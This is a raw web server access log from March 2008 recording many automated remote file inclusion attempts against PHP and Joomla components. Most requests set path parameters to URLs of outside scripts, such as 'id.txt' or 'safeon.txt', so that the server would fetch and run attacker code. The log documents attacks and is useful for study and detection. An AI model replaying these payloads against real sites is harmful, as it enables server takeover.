62.189.126.85 - - [25/Mar/2008:07:30:26 -0700] "GET /index2.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:31:59 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($DaL-ReD)%7D%7D%7B$%7Bexit()%7D%7D&DaL-ReD=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:32:02 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($DaL-ReD)%7D%7D%7B$%7Bexit()%7D%7D&DaL-ReD=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
89.108.66.169 - - [25/Mar/2008:07:32:39 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://yoga0400.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:07:32:44 -0700] "GET /logs/_theme/breadcrumb.php?rootBase=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.142.223.177 - - [25/Mar/2008:07:32:44 -0700] "GET /_theme/breadcrumb.php?rootBase=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:07:32:45 -0700] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:07:32:45 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:07:32:45 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:32:58 -0700] "GET /logs/access_080216.log/main.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:32:58 -0700] "GET /logs/main.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:33:12 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:33:15 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:07:34:31 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.99 - - [25/Mar/2008:07:35:41 -0700] "GET /logs/access_080112.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:07:36:01 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:07:36:03 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:07:36:03 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:07:36:32 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:07:36:33 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:07:36:33 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:36:42 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:07:36:45 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:37:52 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:37:53 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:37:54 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.107.122 - - [25/Mar/2008:07:38:02 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:38:03 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:38:05 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:07:38:21 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:38:26 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.84.237.162 - - [25/Mar/2008:07:38:26 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://www.teste.dark-hosting.be/mohaa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.195.44.111 - - [25/Mar/2008:07:38:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [25/Mar/2008:07:38:44 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.172.140.56 - - [25/Mar/2008:07:38:56 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [25/Mar/2008:07:38:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.140.56 - - [25/Mar/2008:07:38:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:40:01 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:40:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:40:01 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.120 - - [25/Mar/2008:07:40:23 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 670488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:07:40:42 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:07:40:52 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:07:40:54 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:07:40:57 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:07:41:14 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.170.72.75 - - [25/Mar/2008:07:41:30 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://wp1035825.wp059.webpack.hosteurope.de/phpkit/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.72.75 - - [25/Mar/2008:07:41:31 -0700] "GET /index.php?pageurl=http://wp1035825.wp059.webpack.hosteurope.de/phpkit/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.72.75 - - [25/Mar/2008:07:41:31 -0700] "GET /logs/index.php?pageurl=http://wp1035825.wp059.webpack.hosteurope.de/phpkit/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:07:42:42 -0700] "GET /logs/access_080313.log//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:07:42:58 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:07:42:58 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:07:42:59 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:43:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:43:17 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:43:22 -0700] "GET /logs/access_080225.log/index2.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:43:22 -0700] "GET /logs/index2.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:07:43:23 -0700] "GET /logs/access_080131.log/index2.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:07:43:42 -0700] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:07:43:42 -0700] "GET /logs/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:43:54 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:43:55 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:43:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.94 - - [25/Mar/2008:07:44:00 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:44:31 -0700] "GET /logs/access_080312.log/atom.php5?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:44:31 -0700] "GET /atom.php5?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:44:31 -0700] "GET /logs/atom.php5?page=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.60.118.137 - - [25/Mar/2008:07:44:45 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.118.137 - - [25/Mar/2008:07:44:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.118.137 - - [25/Mar/2008:07:44:46 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgiha.org/cms/images/zoom/LVDSKE/thumbs.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.75 - - [25/Mar/2008:07:44:50 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:44:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.254.125 - - [25/Mar/2008:07:45:13 -0700] "GET /logs/access_080211.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.94 - - [25/Mar/2008:07:45:50 -0700] "GET /logs/access.log HTTP/1.0" 200 191485 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:45:58 -0700] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:45:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:45:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:07:46:41 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.72.75 - - [25/Mar/2008:07:47:07 -0700] "GET /logs/access_080117.log/index.php?pageurl=http://wp1035825.wp059.webpack.hosteurope.de/phpkit/admin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:47:10 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
62.141.48.206 - - [25/Mar/2008:07:47:10 -0700] "GET //components/com_webring/admin.webring.docs.php?component_dir=http://www.grandiralecole.fr/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.51.77.2 - - [25/Mar/2008:07:47:30 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.77.2 - - [25/Mar/2008:07:47:30 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.77.2 - - [25/Mar/2008:07:47:31 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.94.66 - - [25/Mar/2008:07:48:13 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:07:49:05 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.52.242 - - [25/Mar/2008:07:49:06 -0700] "GET /index.php?redir=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.141.52.242 - - [25/Mar/2008:07:49:06 -0700] "GET /logs/index.php?redir=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.51.77.2 - - [25/Mar/2008:07:49:09 -0700] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:49:34 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:07:49:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.152.166.135 - - [25/Mar/2008:07:51:05 -0700] "GET /logs/access_071230.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.51.77.2 - - [25/Mar/2008:07:51:16 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:29 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:29 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:51 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:51 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:52:52 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:07:53:01 -0700] "GET /index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.214.191 - - [25/Mar/2008:07:53:23 -0700] "GET /logs//?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 200 40268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.50.214.191 - - [25/Mar/2008:07:53:23 -0700] "GET //?mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:53:41 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:07:53:42 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.40.137 - - [25/Mar/2008:07:53:44 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.208.40.137 - - [25/Mar/2008:07:53:45 -0700] "GET //protection.php?action=logout&siteurl=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
